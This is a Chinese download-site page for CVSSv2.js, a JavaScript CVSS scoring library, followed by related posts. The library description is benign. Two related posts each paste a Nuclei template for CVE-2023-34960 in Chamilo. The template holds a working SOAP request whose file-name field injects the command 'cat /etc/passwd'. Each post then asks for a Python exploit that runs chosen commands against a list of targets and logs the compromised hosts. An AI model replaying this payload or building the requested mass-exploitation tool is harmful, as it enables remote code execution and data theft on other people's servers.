活动介绍
file-type

开源JavaScript库CVSSv2.js:轻松共享和部署CVSS评分

ZIP文件

下载需积分: 50 | 88KB | 更新于2024-11-09 | 105 浏览量 | 6 下载量 举报 收藏
download 立即下载
该库旨在便于漏洞评估结果的共享和部署。CVSS是一种开放标准,旨在为计算机系统安全漏洞评估提供一个通用的严重性评分,用于帮助信息安全专业人员理解和优先处理各种安全漏洞。该库的分数范围从0到10,以提供一个直观的方式来衡量一个漏洞的严重性,并将漏洞分为关键、主要和次要三个等级。以下是对该库的详细知识点解析: 1. CVSS评分系统基础 通用漏洞评分系统(CVSS)是一个被广泛接受的行业标准,用于评估信息系统的安全漏洞。CVSS提供了一套框架,通过定义一系列度量标准来量化漏洞的严重程度。这个框架包含三个主要的度量组:基础度量组、时间度量组和环境度量组。每个度量组都包含一组特定的度量标准,用以反映漏洞的不同方面。 2. CVSS2版本度量标准 CVSS版本2.0在度量标准上有所差异,它包括基本指标、时间指标和环境指标三部分。基础度量组考虑了攻击向量(AV)、攻击复杂度(AC)、认证要求(Au)、机密性影响(C)、完整性影响(I)和可用性影响(A)六个方面。这些因素被用来计算一个基础分数,反映了在不考虑特定环境因素的情况下漏洞的严重程度。 3. 漏洞严重程度分级 CVSSv2.js计算得出的分数决定了漏洞的优先级。按照CVSSv2.0的定义,基础分数在7.0到10.0之间被分类为关键漏洞(Critical),意味着该漏洞可能被攻击者利用来对系统造成严重影响。分数在4.0到6.9范围内的漏洞被归类为主要漏洞(Major),而0到3.9范围内的为次要漏洞(Minor),这些漏洞的影响相对较低。 4. CVSS2算法的实际应用 为了更加直观地理解CVSS2算法的工作原理,CVSSv2.js提供了一个Live Demo,该演示能够帮助用户更好地掌握如何使用这个库来计算特定漏洞的CVSS基础分数。 5. JavaScript库的使用特点 CVSSv2.js作为一个JavaScript库,其优势在于易于共享和部署。这意味着开发者可以在Web应用中嵌入这个库,以在用户界面上实现漏洞评估功能,或者在后台服务中进行自动化的安全评估。由于JavaScript的普遍性和易用性,CVSSv2.js的使用门槛较低,便于广泛传播和应用。 6. 开源和社区支持 作为开源软件,CVSSv2.js的源代码可以被任何人访问和修改,以便更好地适应不同需求。开源特性还意味着它可以从社区获得持续的支持和更新,有助于库的维护和漏洞修复。 7. 应用场景和目的 CVSSv2.js的主要应用场景包括信息安全评估、漏洞管理、网络安全监控等。它可以帮助组织快速评估新发现的漏洞,从而有效地分配资源,优先解决那些最为严重的问题。对于安全研究人员和分析师而言,CVSSv2.js提供了一个快速且方便的工具来分析和交流漏洞信息。"

相关推荐

filetype

id: CVE-2023-34960 info: name: Chamilo Command Injection author: DhiyaneshDK severity: critical description: | A command injection vulnerability in the wsConvertPpt component of Chamilo v1.11.* up to v1.11.18 allows attackers to execute arbitrary commands via a SOAP API call with a crafted PowerPoint name. impact: | Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system. remediation: | Apply the latest security patches or updates provided by the vendor to fix the command injection vulnerability in Chamilo LMS. reference: - https://sploitus.com/exploit?id=FD666992-20E1-5D83-BA13-67ED38E1B83D - https://github.com/Aituglo/CVE-2023-34960/blob/master/poc.py - http://chamilo.com - http://packetstormsecurity.com/files/174314/Chamilo-1.11.18-Command-Injection.html - https://support.chamilo.org/projects/1/wiki/Security_issues#Issue-112-2023-04-20-Critical-impact-High-risk-Remote-Code-Execution classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-34960 cwe-id: CWE-77 epss-score: 0.93314 epss-percentile: 0.99067 cpe: cpe:2.3:a:chamilo:chamilo:*:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: chamilo product: chamilo shodan-query: - http.component:"Chamilo" - http.component:"chamilo" - cpe:"cpe:2.3:a:chamilo:chamilo" tags: cve,cve2023,packetstorm,chamilo http: - raw: - | POST /main/webservices/additional_webservices.php HTTP/1.1 Host: {{Hostname}} Content-Type: text/xml; charset=utf-8 <?xml version="1.0" encoding="UTF-8"?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="{{RootURL}}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><ns1:wsConvertPpt><param0 xsi:type="ns2:Map"><item><key xsi:type="xsd:string">file_data</key><value xsi:type="xsd:string"></value></item><item><key xsi:type="xsd:string">file_name</key><value xsi:type="xsd:string">`{}`.pptx'|" |cat /etc/passwd||a #</value></item><item><key xsi:type="xsd:string">service_ppt2lp_size</key><value xsi:type="xsd:string">720x540</value></item></param0></ns1:wsConvertPpt></SOAP-ENV:Body></SOAP-ENV:Envelope> matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" part: body - type: word part: header words: - text/xml - type: status status: - 200 # digest: 4a0a00473045022034e60ad33e2160ec78cbef2c6c410b14dabd6c3ca8518c21571e310453a24e25022100927e4973b55f38f2cc8ceca640925b7066d4325032b04fb0eca080984080a1d0:922c64590222798bb761d5b6d8e72950根据poc实现python的exp,并且读取当前目录下的文件 批量执行 ,例如,python CVE-2023-34960.py -f .8.txt -c "需要执行的命令" 并将执行成功的结果输出 -o 9.txt 添加选项-o 8.txt的文本文件

filetype

id: CVE-2023-34960 info: name: Chamilo Command Injection author: DhiyaneshDK severity: critical description: | A command injection vulnerability in the wsConvertPpt component of Chamilo v1.11.* up to v1.11.18 allows attackers to execute arbitrary commands via a SOAP API call with a crafted PowerPoint name. impact: | Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system. remediation: | Apply the latest security patches or updates provided by the vendor to fix the command injection vulnerability in Chamilo LMS. reference: - https://sploitus.com/exploit?id=FD666992-20E1-5D83-BA13-67ED38E1B83D - https://github.com/Aituglo/CVE-2023-34960/blob/master/poc.py - http://chamilo.com - http://packetstormsecurity.com/files/174314/Chamilo-1.11.18-Command-Injection.html - https://support.chamilo.org/projects/1/wiki/Security_issues#Issue-112-2023-04-20-Critical-impact-High-risk-Remote-Code-Execution classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-34960 cwe-id: CWE-77 epss-score: 0.93314 epss-percentile: 0.99067 cpe: cpe:2.3:a:chamilo:chamilo:*:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: chamilo product: chamilo shodan-query: - http.component:"Chamilo" - http.component:"chamilo" - cpe:"cpe:2.3:a:chamilo:chamilo" tags: cve,cve2023,packetstorm,chamilo http: - raw: - | POST /main/webservices/additional_webservices.php HTTP/1.1 Host: {{Hostname}} Content-Type: text/xml; charset=utf-8 <?xml version="1.0" encoding="UTF-8"?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="{{RootURL}}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><ns1:wsConvertPpt><param0 xsi:type="ns2:Map"><item><key xsi:type="xsd:string">file_data</key><value xsi:type="xsd:string"></value></item><item><key xsi:type="xsd:string">file_name</key><value xsi:type="xsd:string">`{}`.pptx'|" |cat /etc/passwd||a #</value></item><item><key xsi:type="xsd:string">service_ppt2lp_size</key><value xsi:type="xsd:string">720x540</value></item></param0></ns1:wsConvertPpt></SOAP-ENV:Body></SOAP-ENV:Envelope> matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" part: body - type: word part: header words: - text/xml - type: status status: - 200 # digest: 4a0a00473045022034e60ad33e2160ec78cbef2c6c410b14dabd6c3ca8518c21571e310453a24e25022100927e4973b55f38f2cc8ceca640925b7066d4325032b04fb0eca080984080a1d0:922c64590222798bb761d5b6d8e72950请根据上面的poc,用python实现exp,并且读取当前目录下的文件 批量执行,例如参数 -f 777.txt ,-c “需要执行的命令”需要为动态变量 ,并且-o 7.txt,7.txt为文件名动态变量,让用户自主选择,例如 python CVE-2023-34960exp.py -f 777.txt -c "id" -o 89.txt,并显示详细成功和失败过程,并将利用成功的目标分别存放至用户选择输出的文件里。-o 输出的文件保存利用成功结果 结果输出系统:彩色终端输出(成功绿色/失败红色)、实时显示命令执行结果片段、自动保存成功目标到指定文件、详细统计报告。智能URL处理:自动补全协议头(http/https)自动构造完整的API端点路径。在测试过程中将发包请求和响应,显示出来,增加详细利用过程